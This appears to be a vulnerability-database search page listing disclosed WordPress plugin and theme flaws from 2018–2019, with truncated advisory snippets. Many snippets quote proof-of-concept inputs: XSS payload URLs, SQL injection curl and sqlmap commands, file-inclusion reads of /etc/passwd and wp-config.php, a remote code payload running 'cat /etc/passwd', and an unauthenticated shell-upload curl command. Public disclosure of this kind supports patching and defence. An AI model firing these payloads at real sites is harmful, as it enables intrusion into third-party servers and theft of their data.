Lucene search
K
WpexploitRecent

4359 matches found

wpexploit
wpexploit
added 2019/05/18 12:0 a.m.10 views

Newsletter Manager < 1.5 - Unauthenticated Open Redirect

The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header PHP function, leading to an open redirect issue In the file '/newsletter-manager/confirmation.php': 33: $xyzemurl = base64decode$GET'appurl'; ... 179:...

0.5AI score
Exploits0References1
wpexploit
wpexploit
added 2019/05/06 12:0 a.m.37 views

W3 Total Cache <= 0.9.7.3 - Blind SSRF and RCE via phar

The implementation of opcacheflushfile calls fileexists with a parameter fully controlled by the user. curl 'http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php' --data 'nonce=974ca6ad15021a6668e7ae02e1be551c&command=flushfile&file=ftp://y.y.y.y:zzzz/' Note: The nonce value is given ...

1.6AI score
Exploits0References1
wpexploit
wpexploit
added 2019/05/06 12:0 a.m.51 views

W3 Total Cache <= 0.9.7.3 - Cross-Site Scripting (XSS)

The W3 Total Cache WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability. alert1"...

0.2AI score
Exploits0References1
wpexploit
wpexploit
added 2019/05/05 12:0 a.m.22 views

Travel Booking < 2.7.8.4 - Reflected & Stored XSS

Weak security measures like no input & textarea fields data filtering has been discovered in the 'Traveler - Travel Booking WordPress Theme'. Special Notes: 1 - 'Change Avatar' upload field works really strange. F.e., u can upload any .PHP file with extension .php.png and break profile page Serve...

6.6AI score
Exploits0References1
wpexploit
wpexploit
added 2019/05/01 12:0 a.m.9 views

Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting (XSS)

The Blog Designer WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting XSS security vulnerability. Send POST request to: /wp-admin/admin-ajax.php?action=save&updated=true With request body: customcss=confirm1...

1.2AI score
Exploits0References1
wpexploit
wpexploit
added 2019/04/30 12:0 a.m.12 views

Share This Image <= 1.19 - Stored XSS

Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered Go to the Share This Image menu, and put " in the Selector field from the "What to Share" secti...

0.4AI score
Exploits0
wpexploit
wpexploit
added 2019/04/30 12:0 a.m.16 views

My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS)

Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. http://www.domain.de/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%2FOPENBUGBOUNTY%2F%3E...

4.3CVSS1.9AI score0.02542EPSS
Exploits1References1
wpexploit
wpexploit
added 2019/04/24 12:0 a.m.25 views

JobCareer < 2.5.1 - Authenticated Stored Cross-Site Scripting

Bad input fields data filtering has been discovered in the 'JobCareer | Job Board Responsive WordPress Theme'. http://jobcareer.chimpgroup.com/candidate/asdasdasdasdasd/ Register a new account on the demo website: http://jobcareer.chimpgroup.com/ , then go to the «Resume» profile tab:...

3.5CVSS0.3AI score0.00736EPSS
Exploits2References1
wpexploit
wpexploit
added 2019/04/18 12:0 a.m.20 views

CarSpot Theme <= 2.1.6 - Authenticated Stored XSS

Bad input field data filtering has been discovered in the 'CarSpot – Automotive Car Dealer Wordpress Classified Theme'. Current version of this Premium Theme is 2.1.5. Authorize on the demo website for tests: https://carspot.scriptsbundle.com/, login is [email protected] and passowrd i...

3.5CVSS0.6AI score0.00736EPSS
Exploits2References2
wpexploit
wpexploit
added 2019/04/17 12:0 a.m.27 views

Download Manager <= 2.9.93 - Authenticated Cross-Site Scripting (XSS)

In the pro features of the WordPress download manager plugin, there is a Category Short-code feature witch can use to sort categories with order by a function which will be used as ?orderby=title,publishdate . By adding parameter " and add any XSS payload , the xss payload will execute. To...

4.3CVSS1.3AI score0.12531EPSS
Exploits6References3
wpexploit
wpexploit
added 2019/04/02 12:0 a.m.146 views

WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection

The includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement, leading to an unauthenticated SQL injection issue. curl -k --silent "http://example.com/index.php?restroute=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=fields=3D+from+wpusers+--+-"...

7.5CVSS1.5AI score0.78699EPSS
Exploits6References3
wpexploit
wpexploit
added 2019/03/29 12:0 a.m.10 views

Social Media & Share Icons <= 2.1.7 - Multiple Issues

The Social Media Share Buttons & Social Sharing Icons WordPress plugin was affected by a Multiple Issues security vulnerability. https://plugins.trac.wordpress.org/browser/ultimate-social-media-icons/tags/2.1.7/libs/controllers/sfsibuttonscontroller.phpL877...

2.1AI score
Exploits0References1
wpexploit
wpexploit
added 2019/03/27 12:0 a.m.22 views

Loco Translate < 2.2.2 - Authenticated LFI

WordPress plugin Loco Translate version appears to have an Authenticated LFI Vulnerability under the 'Edit Template' Functionality. The following vulnerability can be exploited by any user with access to the plugin access can range from Admin to Subscriber WPScanTeam Note: Was not able to reprodu...

0.2AI score
Exploits0References1
wpexploit
wpexploit
added 2019/03/25 12:0 a.m.26 views

Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)

Unauthenticated remote code execution has been discovered in functionality that handles settings import. 1. Create payload file and host it on a location accessible by a targeted website. Payload content : "system'cat /etc/passwd'" 2. Visit...

0.7AI score
Exploits0References1
wpexploit
wpexploit
added 2019/03/01 12:0 a.m.7 views

Freemius Library < 2.2.4 - Subscriber+ Arbitrary Option Update

Description The library, used in numerous plugins, does not have proper authorisation when updating blog options, allowing any authenticated users, such as subscriber to update arbitrary options As any authenticated user: Enable new user registrations:...

7.2AI score
Exploits0References4
wpexploit
wpexploit
added 2019/02/26 12:0 a.m.36 views

Ultimate Membership Pro <= 7.5 - Arbitrary media upload

The ajax-upload.php endpoint doesn't check for the current user's capabilities or that they are even logged in, so we can do a few things we shouldn't be able to do: Without any credentials, you can simply POST the image file in the field ihcfile and it'll store it for you: $ curl -F...

0.6AI score
Exploits0References2
wpexploit
wpexploit
added 2019/02/26 12:0 a.m.22 views

Ultimate Membership Pro 7.4.2 <= 7.5 - Arbitrary media include

In addition to cropping/rotating/resizing an image of your choosing, you can abuse the imgUrl feature on versions that it's available on 7.4.2+ at least to make an HTTP request to any site you want. For example, by having it connect to a site you control, you can determine the IP address of the...

0.8AI score
Exploits0References2
wpexploit
wpexploit
added 2019/02/15 12:0 a.m.76 views

Advanced Custom Fields <= 5.7.10 - Unserialize of user input

Multiple maybeunserialize calls result with unserialize of user input. Low priviledged users as contributors, but in many cases visitors too https://medium.com/websec/wordpress-acf-5-7-10-unserialize-of-user-input-ac17cc473e0d...

3.4AI score
Exploits0References1
wpexploit
wpexploit
added 2019/02/05 12:0 a.m.34 views

Quiz And Survey Master < 6.2.2 - Authenticated Cross-Site Scripting (XSS)

The Quiz And Survey Master – Best Quiz, Exam and Survey Plugin for WordPress WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability. http://example.com/wp-admin/admin.php?page=mlwquizresults&quizid=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E...

4.3CVSS1.6AI score0.01608EPSS
Exploits2References2
wpexploit
wpexploit
added 2019/02/05 12:0 a.m.30 views

Contact Form Email <= 1.2.65 - Multiple Cross-Site Scripting (XSS) & CSRF

The Contact Form Email WordPress plugin was affected by a Multiple Cross-Site Scripting XSS & CSRF security vulnerability. http://www.example.com/wp-admin/admin.php?page=cpcontactformtoemail&edit=1&cal=1&item='"...

6.8CVSS1.7AI score0.01389EPSS
Exploits2References2
wpexploit
wpexploit
added 2019/02/05 12:0 a.m.21 views

Blog2Social <= 5.0.2 - Authenticated Cross-Site Scripting (XSS)

The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability. http://example.com/wp-admin/admin.php?page=blog2social-ship&postId=70&b2saction=1&b2supdatepublishdate='"...

4.3CVSS1.4AI score0.01408EPSS
Exploits2References3
wpexploit
wpexploit
added 2019/01/09 12:0 a.m.8 views

User Registration <= 1.5.5 - Authenticated Cross-Site Scripting (XSS)

The User Registration – Custom Registration Form, Login And User Profile For WordPress WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability...

1.2AI score
Exploits0References1
wpexploit
wpexploit
added 2019/01/08 12:0 a.m.17 views

MapSVG Lite <= 3.2.3 - Cross-Site Request Forgery (CSRF)

CSRF in the mapsvgsave AJAX method...

6.8CVSS1AI score0.00795EPSS
Exploits2References1
wpexploit
wpexploit
added 2019/01/07 12:0 a.m.40 views

JSmol2WP <= 1.07 - Unauthenticated Cross-Site Scripting (XSS)

The jsmol2wp WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert/xss/%3C/script%3E&mimetype=text/html;%20charset=utf-8...

4.3CVSS1.6AI score0.0397EPSS
Exploits2References1
wpexploit
wpexploit
added 2018/12/25 12:0 a.m.244 views

JSmol2WP <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF)

The jsmol2wp WordPress plugin was affected by an Unauthenticated Server Side Request Forgery SSRF security vulnerability. http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php...

5CVSS2.7AI score0.13078EPSS
Exploits2References1
wpexploit
wpexploit
added 2018/12/11 12:0 a.m.379 views

WP AutoSuggest 0.24 - Unauthenticated SQL Injection

The wp-autosuggest WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability. sqlmap -u "http://URL/wp-content/plugins/wp-autosuggest/autosuggest.php?wpasaction=query&wpaskeys=1" --technique BT --dbms MYSQL --risk 3 --level 5 -p wpaskeys --tamper space2comment...

1.2AI score
Exploits0References1
wpexploit
wpexploit
added 2018/11/14 12:0 a.m.41 views

Master Slider <= 3.7.0 - Authenticated Stored Cross-Site Scripting (XSS)

The plugin does not properly sanitise the slider name when creating or editing a slider, leading to an Authenticated editor+ Stored Cross-Site Scripting issue which will be triggered in the Slider table /wp-admin/admin.php?page=master-slider. Edit WPScanTeam: - The original report was from 2018,...

3.5CVSS5.4AI score0.00705EPSS
Exploits4References1
wpexploit
wpexploit
added 2018/11/08 12:0 a.m.52 views

WP GDPR Compliance <= 1.4.2 - Unauthenticated Call Any Action or Update Any Option

The plugin WP GDPR Compliance allows unauthenticated users to execute any action and to update any database value. If the request data form is available for unauthenticated users, even unauthenticated users are able to do this. See references for discussion of the issue. The problem is in the fil...

7.5CVSS0.5AI score0.87294EPSS
Exploits4References3
wpexploit
wpexploit
added 2018/11/07 12:0 a.m.10 views

Better WordPress reCAPTCHA <= 2.0.3 - Unauthenticated Cross-Site Scripting (XSS)

There is a reflected XSS vulnerability in Better WordPress reCAPTCHA plugin version 2.0.3, and possibly below. The parameter cerror value is reflected in the page when this plugin is enabled. Once plugin disabled, the "cerror" parameter's value is not reflected in the page anymore. This is the HT...

1AI score
Exploits0References1
wpexploit
wpexploit
added 2018/11/05 12:0 a.m.24 views

Media File Manager <= 1.4.2 - Authenticated Multiple Vulnerabilities

Following the PoC you can combine the vulnerabilities to obtain PHP code execution and read sensitive file. By default the File Manager can only be used by Administrator users, however, any user role can be configured to use it. Diretory Trasversal: POST /wordpress/wp-admin/admin-ajax.php HTTP/1....

5CVSS0.2AI score0.12128EPSS
Exploits5References2
wpexploit
wpexploit
added 2018/10/30 12:0 a.m.19 views

Calendar <= 1.3.10 - Authenticated Stored Cross-Site Scripting (XSS)

This WordPress plugin allows remote authenticated users, without the unfilteredhtml capability, to execute JavaScript code through stored XSS attack. The plugin by default is available to users with contributor or more privileges. POC 1 You can inject JavaScript code into the event title when...

3.5CVSS1AI score0.0073EPSS
Exploits2
wpexploit
wpexploit
added 2018/10/26 12:0 a.m.40 views

Flow-Flow Social Stream <= 3.0.71 - Unauthenticated Cross-Site Scripting (XSS)

Cross-Site Scripting XSS vulnerability in the JSON output by modifying the hash parameter in admin-ajax.php using the fetchposts action. Response Content-Type set to html. http://www.example.com/wp-admin/admin-ajax.php?action=fetchposts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert1%3E...

0.3AI score
Exploits0References1
wpexploit
wpexploit
added 2018/10/24 12:0 a.m.25 views

Pie Register <= 3.0.17 - Unauthenticated Cross-Site Scripting (XSS)

The Pie Register – User Registration Forms. Invitation based registrations, Custom Login, Payments WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. ttp://www.website.com/wordpress/index.php/forgot-password/?"alert1...

0.8AI score
Exploits0References2
wpexploit
wpexploit
added 2018/10/15 12:0 a.m.53 views

Tajer - Unauthenticated Arbitrary File Upload

The tajer WordPress plugin was affected by an Unauthenticated Arbitrary File Upload security vulnerability. curl -F "[email protected]" http://www.example.com/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/index.php Shell is uploaded to:...

7.5CVSS1.5AI score0.97107EPSS
Exploits15References1
wpexploit
wpexploit
added 2018/10/08 12:0 a.m.61 views

WPML <= 3.6.3 - Unauthenticated Stored Cross-Site Scripting (XSS)

The sitepress-multilingual-cms WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting XSS security vulnerability. POST /wp-admin/admin.php?page=sitepress-multilingual-cms-3.6.3%2Fmenu%2Ftheme-localization.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 Windows NT 6.1...

4.3CVSS0.6AI score0.13207EPSS
Exploits2References1
wpexploit
wpexploit
added 2018/10/02 12:0 a.m.76 views

Wordfence <= 7.1.12 - Username Enumeration Prevention Bypass

The Wordfence Security – Firewall & Malware Scan WordPress plugin was affected by an Username Enumeration Prevention Bypass security vulnerability. Wordfence blocks: http://www.example.com/?author=1 But allowed: http://www.example.com/?author=1...

0.9AI score
Exploits0References2
wpexploit
wpexploit
added 2018/09/28 12:0 a.m.12 views

Breadcrumb NavXT <= 6.1.0 - Username Disclosure via REST API

The Breadcrumb NavXT WordPress plugin was affected by an Username Disclosure via REST API security vulnerability. http://www.example.com/wp-json/bcn/v1/author/1...

1.7AI score
Exploits0References2
wpexploit
wpexploit
added 2018/09/19 12:0 a.m.27 views

Wechat Broadcast <= 1.2.0 - Local/Remote File Inclusion

This bug was found in the file: /wechat-broadcast/wechat/Image.php echo filegetcontentsisset$GET"url" ? $GET"url" : ''; The parameter "url" it is not sanitized allowing include local or remote files To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact...

7.5CVSS0.1AI score0.6307EPSS
Exploits4References2
wpexploit
wpexploit
added 2018/09/19 12:0 a.m.22 views

Localize My Post 1.0 - Unauthenticated Local File Inclusion (LFI)

The localize-my-post WordPress plugin was affected by an Unauthenticated Local File Inclusion LFI security vulnerability. http://www.example.com/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd...

5CVSS1.8AI score0.43722EPSS
Exploits2References3
wpexploit
wpexploit
added 2018/09/17 12:0 a.m.21 views

File Manager < 3.1 - CSRF to Stored Cross-Site Scripting

The plugin is lacking CSRF as well as sanitisation checks, allowing attackers to perform CSRF attacks against logged in administrators and set an XSS payload in the publicpath setting...

6.8CVSS1.1AI score0.01365EPSS
Exploits3References1
wpexploit
wpexploit
added 2018/09/06 12:0 a.m.16 views

File Manager < 3.0 - Authenticated Reflected Cross-Site Scripting (XSS)

Lack of sanitisation in the lang parameter in the admin dashboard could allow attacker to perform reflected XSS attacks against logged in administrators https://example.com/wp-admin/admin.php?page=wpfilemanager&lang=zhCNalertXSS...

3.5CVSS2.2AI score0.01383EPSS
Exploits2References3
wpexploit
wpexploit
added 2018/09/05 12:0 a.m.25 views

Duplicator <= 1.2.40 - Unauthenticated Arbitrary Code Execution

If installer files, installer.php and installer-backup.php, are not removed by the administrators, a code injection during the database setup step allows to execute arbitrary code on the server. actionajax=3&actionstep=3&dbhost=nowhere&dbuser=test&dbpass=test&dbname=test';...

3.9AI score
Exploits0References2
wpexploit
wpexploit
added 2018/09/05 12:0 a.m.13 views

Image Intense <= 3.2.5 - Authenticated SQL Injection in shortcodes

The vendor does not consider it to be a vulnerability, it remains unfixed. SQL Injection in handling of the "etpbimagen10s" shortcode. The last version at the time of the original advisory, 3.2.5, is known to be affected. etpbsection bbbuilt="1"etpbrowetpbcolumn type="44"etpbimagen10s...

3.3AI score
Exploits0References2
wpexploit
wpexploit
added 2018/08/31 12:0 a.m.18 views

UserPro <= 4.9.23 - Unauthenticated Cross-Site Scripting (XSS)

An XSS vulnerability that affects from version 2.13 to 4.9.23. POST /wp-admin/admin-ajax.php Host: domain.com action=userproshortcodetemplate&shortcode=userpro id=1 layout="float" collageperpage="20" emdpaginatetop="1" emdpaginate="1" emdgender="Gender,radi...

4.3CVSS1.3AI score0.01345EPSS
Exploits2References3
wpexploit
wpexploit
added 2018/08/26 12:0 a.m.21 views

Gift Voucher <= 4.1.1 - Unauthenticated Blind SQL Injection

The wpgvdoajaxfronttemplate AJAX action both authenticated and unauthenticated, defined in the front.php does not sanitised, validate or escape the templateid parameter before using it in a SQL statement, leading to a SQL Injection issue. This has been present since at least 1.0.5 v4.1.0 tried to...

7.5CVSS0.9AI score0.49918EPSS
Exploits2References1
wpexploit
wpexploit
added 2018/08/19 12:0 a.m.13 views

Supreme Directory Theme <= 1.1.8 - Unauthenticated Cross-Site Scripting (XSS)

This theme has a parameter, s, that allows execute a xss payload: " 1. Install the theme 2. Access the web on another browser 3. Write this uri: website.com/?s="alert0...

1AI score
Exploits0References1
wpexploit
wpexploit
added 2018/08/16 12:0 a.m.23 views

Chained Quiz <= 1.0.8 - Unauthenticated SQL Injection

WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters. Technical details: Chained Quiz appears to be vulnerable to time-based SQL-Injection. The issue lies on the "$answer" backend variable...

7.5CVSS1.4AI score0.02686EPSS
Exploits2References1
wpexploit
wpexploit
added 2018/08/16 12:0 a.m.14 views

Export Users to CSV <= 1.1.1 - CSV Injection

WordPress Export users to CSV plugin version 1.1.1. and before are affected by Remote Code Execution through the CSV injection vulnerability. This allows an application user to inject commands as part of the fields of his profile and these commands are executed when a user with greater privilege...

6.8CVSS1.1AI score0.01498EPSS
Exploits1References2
wpexploit
wpexploit
added 2018/07/20 12:0 a.m.23 views

Multi Step Form <= 1.2.5 - Multiple Unauthenticated Reflected XSS

WordPress Plugin Multi Step Form before 1.2.5 allows remote users to execute JavaScript code through Reflected XSS attacks. This issue can be exploited by unauthenticated attackers, by the use of CSRF, for example. The following parameters are vulnerable in fwsenddata function: fwdataid1 fwdataid...

4.3CVSS0.6AI score0.01255EPSS
Exploits2References2
wpexploit
wpexploit
added 2018/07/10 12:0 a.m.22 views

All In One Favicon <= 4.6 - Multiple Stored Authenticated XSS

Authenticated Stored Cross-Site Scripting XSS in 8 parameters: backendApple-Text backendGIF-Text backendICO-Text backendPNG-Text frontendApple-Text frontendGIF-Text frontendICO-Text frontendPNG-Text " "...

3.5CVSS2.5AI score0.02003EPSS
Exploits6References2
Total number of security vulnerabilities4359